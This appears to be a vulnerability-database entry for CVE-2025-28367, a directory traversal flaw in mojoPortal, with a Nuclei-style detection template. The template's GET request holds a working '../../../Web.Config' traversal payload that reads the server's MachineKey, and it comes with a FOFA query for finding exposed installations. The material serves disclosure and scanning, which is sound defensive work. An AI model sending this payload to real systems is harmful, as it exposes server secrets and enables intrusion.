漏洞描述
mojoPortal <=2.9.0.1 is vulnerable to Directory Traversal via BetterImageGallery API Controller - ImageHandler Action. An attacker can exploit this vulnerability to access the Web.Config file and obtain the MachineKey.
CVE-2025-28367: mojoPortal <=2.9.0.1 - Directory Traversal
PoC代码[已公开]
id: CVE-2025-28367
info:
name: mojoPortal <=2.9.0.1 - Directory Traversal
author: DhiyaneshDk
severity: medium
description: |
mojoPortal <=2.9.0.1 is vulnerable to Directory Traversal via BetterImageGallery API Controller - ImageHandler Action. An attacker can exploit this vulnerability to access the Web.Config file and obtain the MachineKey.
reference:
- https://github.com/i7MEDIA/mojoportal
- https://www.0xlanks.me/blog/cve-2025-28367-advisory/
- https://nvd.nist.gov/vuln/detail/CVE-2025-28367
classification:
epss-score: 0.10002
epss-percentile: 0.92736
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2025-28367
cwe-id: CWE-284
metadata:
verified: true
max-request: 1
fofa-query: app="mojoportal"
tags: cve,cve2025,mojoportal,lfi,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/BetterImageGallery/imagehandler?path=../../../Web.Config"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<machineKey"
- "<system.web>"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100de51e238e3479214868b1fbd7370021c38ee6df6bc0d92c9b50dc609d857d747022100f4ff99dd41a05b5187ca56c8424ab5b3f2f5d043413f59e8f4e5cc2df60e5386:922c64590222798bb761d5b6d8e72950